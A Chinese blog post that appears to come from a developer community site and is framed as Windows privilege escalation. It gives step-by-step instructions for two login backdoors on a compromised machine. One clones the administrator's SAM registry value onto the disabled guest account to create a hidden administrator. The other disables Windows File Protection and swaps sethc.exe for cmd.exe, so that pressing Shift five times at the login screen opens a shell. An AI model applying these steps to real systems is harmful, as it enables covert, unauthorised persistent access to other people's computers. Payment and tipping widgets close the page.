Windows系统提权——登录后门全设置

当我们取得Windows系统的登录权限后,下一步考虑的无疑是登录后门的设置问题,如何设置隐藏的登录后门,本文提供两种思路以供借鉴。

 

、建立隐藏的管理员账号登录:

思路:通过这种方式,攻击者可以设置后门,将账号管理中显示为已禁用的用户如guest授予管理员权限,并随时登录。

步骤:

1 、打开regedit:打开hkey_Local_Mashion,单击SAM,点击右键,点权限,将“完全控制”权限赋给管理员,退出后重新打开regedit,否则SAM下的项目无法打开;

2 、打开SAM——SAM——domians——ACCOUNT——users,将1F4(administrator)下的F键值全选copy1F5(guest)下的F键值;

3、现在系统的计算机管理中guest账户仍为禁用,但使用guest账户登录后即可以拥有administrator的所有权限。

 

windows不需要密码登录:

思路:使用windows系统登录时的实用程序,如粘滞键:sethc.exe,可以考虑将sethc.exe替换为cmd.exe

步骤:

1、关闭windows文件保护(WFP):打开regedit,打开HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon,将“SFCDisable”的键值修改为“FFFFFF9D”,如果需要重新启用该功能,重新设置为“0”就可以了;

2、将sethc.exe改名: 进入c:/windows/system32/dllcache

   1)运行attrib –s –r –h

      2)ren sethc.exe  ~.*

3、更换为cmd.exe:进入 c:/windows/system32

      1)运行 attrib –s –r –h

      2) copy cmd.exe sethc.exe

4、 此时在登录页面,按5shift键,就可以调出cmd.exe,然后输入explorer.exe既可进入桌面。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值